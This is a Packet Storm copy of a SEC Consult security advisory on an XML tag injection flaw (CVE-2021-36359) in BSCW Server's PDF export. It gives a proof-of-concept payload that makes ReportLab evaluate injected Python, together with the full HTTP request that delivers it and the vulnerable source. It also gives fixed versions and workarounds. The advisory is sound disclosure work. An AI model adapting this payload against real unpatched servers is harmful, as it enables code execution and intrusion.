what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BSCW Server XML Injection

BSCW Server XML Injection
Posted Aug 31, 2021
Authored by Armin Stock | Site sec-consult.com

BSCW Server versions 7.4.2 and below, 7.3.2 and below, 5.2.3 and below, 5.1.9 and below, and 5.0.11 and below suffer from an XML tag injection vulnerability.

tags | exploit
advisories | CVE-2021-36359
SHA-256 | 0c56c88ea69c8de1bff4db2aee1d3ede8a753424e728d03ae82775f025eaea03

BSCW Server XML Injection

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20210827-1 >
=======================================================================
title: XML Tag injection
product: BSCW Server
vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
CVE number: CVE-2021-36359
impact: high
homepage: https://www.bscw.de/classic/
found: 2021-06-30
by: Armin Stock (Atos Germany)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"A versatile system for any field of application

BSCW Classic is in use around the world. With more than 500 functions, it
offers the right solution for every task. Turn your ideas into reality! Our
proven system has been supporting information flow and knowledge management at
numerous companies for more than 20 years."

Source: https://www.bscw.de/en/classic/


Business recommendation:
------------------------
The vendor provides a patched version for the affected products, which should
be installed immediately.


Vulnerability overview/description:
-----------------------------------
1) XML Tag injection
The application allows a user with low privileges to export different objects
to a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To
export the content of the objects the framework ReportLab is used. This library
supports different tags to export structured content:

-------------------------------------------------------------------------------
# File: reportlab/platypus/paraparser.py
!!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!
The ParaFormatter will be able to format the following
tags:
< /b > - bold
< /i > - italics
< u [color="red"] [width="pts"] [offset="pts"]> < /u > - underline
width and offset can be empty meaning use existing canvas line width
or with an f/F suffix regarded as a fraction of the font size
< strike > < /strike > - strike through has the same parameters as underline
< super [size="pts"] [rise="pts"]> < /super > - superscript
< sup ="pts"] [rise="pts"]> < /sup > - superscript
< sub ="pts"] [rise="pts"]> < /sub > - subscript
<font name=fontfamily/fontname color=colorname size=float>
<span name=fontfamily/fontname color=colorname backcolor=colorname size=float style=stylename>
< bullet > </bullet> - bullet text (at head of para only)
<onDraw name=callable label="a label"/>
<index [name="callablecanvasattribute"] label="a label"/>
<link>link text</link>
attributes of links
size/fontSize/uwidth/uoffset=num
name/face/fontName=name
fg/textColor/color/ucolor=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
underline=bool turn on underline
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
width="w%" --> fontSize*w/100 idea from Roberto Alsina
height="h%" --> linewidth*h/100 <ralsina@netmanagers.com.ar>
<greek> - </greek>
<nobr> ... </nobr> turn off word breaking and hyphenation

The whole may be surrounded by <para> </para> tags
-------------------------------------------------------------------------------

The application does not properly encode the user content before passing it to
`ReportLab`, which allows the user to inject own tags. These tags get evaluated
by the `ReportLab`.

Depending on the version of `ReportLab` it allows the user to do a `SSRF`
(server side request forgery) attack via the `img` tag
(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145).

There are also known vulnerabilites in `ReportLab`:

* https://www.cybersecurity-help.cz/vdb/SB2019101613
* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2

This allows an attacker to execute `Python` code via the `unichar` tag or the
`color` attribute.


Proof of concept:
-----------------
1) XML Tag injection
One possible injection point is the `description` of a folder. Using the
following payload allows the execution of the `Python` code `28+20`.

<strike>hello</strike><unichar code="28+20"/>

The result of this code is `48` (ASCII: `0`), which gets written to the
generated `PDF` file.

-------------------------------------------------------------------------------
POST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1

Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 765
Origin: http://bscw.local:8080
DNT: 1
Connection: keep-alive
Referer: http://bscw.local:8080/sec/bscw.cgi/1917?op=editfolder.EditFolder&id=1917_2088&inside_dialog=1
Cookie: MicroblogInboxIndicatorState=%5B1629367994%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; bscw_dummy_cookie=opensesame; bscw_auth="wsZjskopxMc1MSIVJq1bnn0fqKqLR9hB:108"; _sec_bscws="45aa7a088a17c12646aaf10d670395cb:264"
Upgrade-Insecure-Requests: 1


op=editfolder.EditFolder&inside_dialog=1&bscw_v_post=cCzT8tEnZ1kR%2FnH6gC15aLTjerCLR9hB&id=1917_2088&_selected=editfolder.NameTagsDescrRate&_editfolder.NameTagsDescrRate_renameo.Chname_name=hello&_editfolder.NameTagsDescrRate_renameo.Chname_=3&_editfolder.NameTagsDescrRate_chtags.EditTags_tags=&_editfolder.NameTagsDescrRate_chtags.EditTags_=3&_editfolder.NameTagsDescrRate_chdescr.Chdescr_descr=<strike>hello</strike><unichar code="28+20"/>&_editfolder.NameTagsDescrRate_chdescr.Chdescr_=3&_editfolder.NameTagsDescrRate_=3&_approval.approval_approval_choice=approval_inherited&_approval.approval_addactions=approval.approval.ApprovalTaskItem&_approval.approval_=3&_autovers_maxvers=inherit&_autovers_mvnr=&_autovers_=3&_=3&__ok_.x=+++OK+++
-------------------------------------------------------------------------------

The vulnerable code in the `ReportLab` framework:
-------------------------------------------------------------------------------
# File: reportlab\platypus\paraparser.py
def start_unichar(self, attr):
if 'name' in attr:
if 'code' in attr:
self._syntax_error('<unichar/> invalid with both name and code attributes')
try:
v = unicodedata.lookup(attr['name'])
except KeyError:
self._syntax_error('<unichar/> invalid name attribute\n"%s"' % ascii(attr['name']))
v = '\0'
elif 'code' in attr:
try:
v = int(eval(attr['code']))
v = chr(v) if isPy3 else unichr(v)
except:
self._syntax_error('<unichar/> invalid code attribute %s' % ascii(attr['code']))
v = '\0'
-------------------------------------------------------------------------------
Most likely there are more injection points to include own tags, but no further
actions were taken to find them.


Vulnerable / tested versions:
-----------------------------
BSCW Classic 5.2.3 has been used to identify the vulnerability.

The vendor confirmed the following versions to be also affected by the
vulnerability:
BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2


Vendor contact timeline:
------------------------
2021-07-31: Sent report to vendor.
2021-08-01: Vendor confirmed the issue and is working on a patch.
2021-08-19: Vendor notified licensed customers about the issue and a patch.
2021-08-27: Coordinated release of security advisory.


Solution:
---------
The vendor provides a patched version for the affected and supported products,
which should be installed immediately.

Additional information can be viewed at the vendor's support page.


Workaround:
-----------
Ensure the the used `ReportLab` version is >= `3.5.55` to mitigiate an active
exploit of these known vulnerabilites.
It is also possbile to disable the `Export to PDF` function. This should be the
preferred way, until the vendor provides a patch.

$ bin/bsadmin package -d exportpdf



Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2021

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close